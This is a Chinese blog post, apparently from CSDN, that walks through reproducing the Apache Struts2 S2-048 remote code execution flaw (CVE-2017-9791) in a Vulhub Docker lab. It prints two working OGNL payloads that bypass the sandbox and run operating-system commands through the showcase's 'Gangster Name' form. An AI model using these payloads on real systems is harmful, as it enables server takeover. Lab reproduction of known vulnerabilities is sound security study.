s2-048远程代码执行漏洞

最新推荐文章于 2024-09-11 17:16:14 发布
最新推荐文章于 2024-09-11 17:16:14 发布
阅读量571 收藏
点赞数 1
分类专栏: Kali 3.0——使用Docker搭建Vulhub漏洞靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45625605/article/details/103141810
版权

一、漏洞描述

     触发OGNL表达式的位置是`Gangster Name`这个表单

    影响版本  

    2.0.0 - 2.3.32

二、环境搭建

     vulhub靶场搭建

三、漏洞复现

        这个环境是直接下载的struts-2.3.32的showcase,部署在tomcat-8.5下。环境启动后,访问`http://your-ip:8080/showcase/`即可查看到struts2的测试页面。 

      

      触发OGNL表达式的位置是`Gangster Name`这个表单。

     

      输入`${233*233}`即可查看执行结果,有结果,存在漏洞

      

      

借用S2-045的沙盒绕过方法,我改了一个POC。将如下POC填入表单`Gengster Name`中,提交即可直接回显命令执行的结果:


%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}         

     你也可以直接用s2-045的POC(你需要在Burp下进行测试):


%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
 

  

 三、查看日志

      

Stephen Wolf
关注
专栏目录
漏洞复现】Struts2 S2-048 远程命令执行漏洞 (CVE-2017-9791)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-11 518
描述:Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。攻击者构造恶意字段值(value)通过Struts2的struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。......
【Vulfocus解题复现】Struts2 S2-048 远程命令执行漏洞 (CVE-2017-9791)
温氏效应
09-04 3965
漏洞介绍 名称:Struts2 S2-048 远程命令执行漏洞 CVE标识符:CVE-2017-9791 描述:Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 攻击者构造恶意字段值(value)通过Struts2的struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。 解题过程 1、打开靶场环境 2、.
S2-048 远程代码执行漏洞
玄道的网安博客
06-29 359
影响版本 2.0.0 - 2.3.32 漏洞搭建 cd vulhub/struts2/s2-048 docker-compose up -d 环境启动后,访问http://your-ip:8080/showcase/即可查看到struts2的测试页面。 漏洞复现 访问Integration->Struts 1 Integration: 触发OGNL表达式的位置是Gangster Name这个表单。 输入${233*233}即可查看执行结果(剩下两个表单随意填写) 发
S2-048远程执行代码漏洞
江小白
07-20 717
受影响的版本:2.0.0 - 2.3.32 利用 这个环境是一个struts-2.3.32展示,在tomcat-8.5中。环境运行后,访问http://your-ip:8080/showcase/以查看struts2 showcase。 Access Integration / Struts 1集成: OGNL表达式漏洞位置是Gangster Name表单。 输入${233*233}...
Struts2-048漏洞复现
最新发布
hongji728696的博客
09-11 913
struts2是一个apache的框架,存在反序列化漏洞,在struts2中存在OGNL表达式,OGNL表达式的二次解析导致这一漏洞
S2-048 远程代码执行漏洞(CVE-2017-9791)
Biu_Biu_Bi的博客
07-12 762
S2-048 远程代码执行漏洞(CVE-2017-9791)
漏洞S2-048 远程代码执行漏洞(CVE-2017-9791)
shy的博客
02-17 1273
S2-048 远程代码执行漏洞(CVE-2017-9791)
Struts2反序列化漏洞复现
热门推荐
wangyuxiang946的博客
07-20 1万+
作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。环境: vulhub。
Struts2 S2-029远程代码执行漏洞初探1
08-08
Struts2 S2-029 远程代码执行漏洞初探 Struts2 是一个基于 Java 的 Web 框架,使用 OGNL 表达式来访问 ActionContext 中的对象数据。在 Struts2 中,标签库使用 OGNL 表达式来获取对象数据,例如 `...
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
复现S2-045远程代码执行漏洞
weixin_67813445的博客
03-28 226
Apache官方发布Struts 2 紧急漏洞公告(S2-045),CVE编号CVE-2017-5638。公告中披露 ,当基于Jakarta插件上传文件时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大危害。
struts2漏洞利用检测工具新添加了struts-048
01-09
增加S2-048 Struts 2.3.X 支持检查官方示例struts2-showcase应用的代码执行漏洞,参考地址:http://127.0.0.1:8080/struts2-showcase/integration/saveGangster.action
远程代码执行漏洞
weixin_59114667的博客
02-28 214
远程执行代码漏洞存在于HTTP协议堆栈中,当HTTP.sys未正确分析经特殊设计的HTTP请求时会导致此漏洞
远程命令/代码执行漏洞
Ethan024的博客
04-06 1424
远程命令执行漏洞(RCE, Remote Command/Code Execute) 可以让攻击者直接向后台服务器远程注入操作系统命令或代码,从而控制后台系统。 远程系统命令执行的原因: (1)应用系统从设计上需要给用户提供指定的源码命令操作接口,比如,路由器,防火墙,入侵检测等设备的web管理界面; (2)一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如果设计者在完成该功能后,没有做严格的安全控制,则可能会导致
Struts2 S2-048远程代码执行漏洞复现
春日野穹
10-23 2769
一、漏洞介绍 1.1 漏洞背景 2017年7月7日,ApacheStruts 发布最新的安全公告,Apache Struts2的strus1插件存在远程代码执行的高危漏洞漏洞编号为 CVE-2017-9791(S2-048)。攻击者可以构造恶意的字段值通过Struts2的struts2-struts1-plugin插件,远程执行代码。 1.2 漏洞影响 Apache Struts 2.3.x系...
远程代码执行漏洞及防御
2301_76717406的博客
03-25 1682
远程命令/代码执行漏洞(RC(command/code)E):RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统;
网路安全之远程代码执行漏洞
qq_52074678的博客
05-11 3335
一。什么是远程代码执行远程代码执行:Remote Code Execute 后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞,不管是使用了代码执行的函数,还是使用了不安全的反序列化等等。 因此,如果需要给前端用户提供操作类的接口,一定需要对接口输入的内容进行严格的判断,比如实施严格的白名单策略会是一个比较好的方法 远程命令执行:Remote Command Execute 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对
远程执行代码漏洞_如何处理远程执行代码漏洞
服务器编程交流平台
07-09 3213
Visual Studio Code是Microsoft为Windows,Max OS和Linux开发的免费源代码编辑器 。 2019年2月12日,Symantec安全中心在MS Visual Studio Code中发现了一个严重的远程执行代码漏洞(CVE-2019-0728)。 此漏洞与2018年6月的另一个漏洞有关,当时报告了一个不受信任的搜索路径漏洞 (CVE-2018-0597)。 ...
S2-048 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-16 692
漏洞背景 Apache的Struts2是一个优雅的,可扩展的开源MVC框架,主要用于创建企业级的Java Web应用程序。在Struts 2.3.X系列的Showcase插件中演示Struts2整合Struts 1的插件中存在一处任意代码执行漏洞。当你的Web应用使用了 Struts 2 Struts 1插件, 则可能导致Struts2执行由外部输入的恶意攻击代码漏洞影响 Apache ...
S2-052远程代码执行漏洞
07-27
S2-052远程代码执行漏洞是Apache Struts 2框架中的一个安全漏洞,影响版本为2.0.0至2.5.12。该漏洞允许攻击者通过构造恶意的OGNL(Object-Graph Navigation Language)表达式,远程执行任意代码。 攻击者可以通过...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值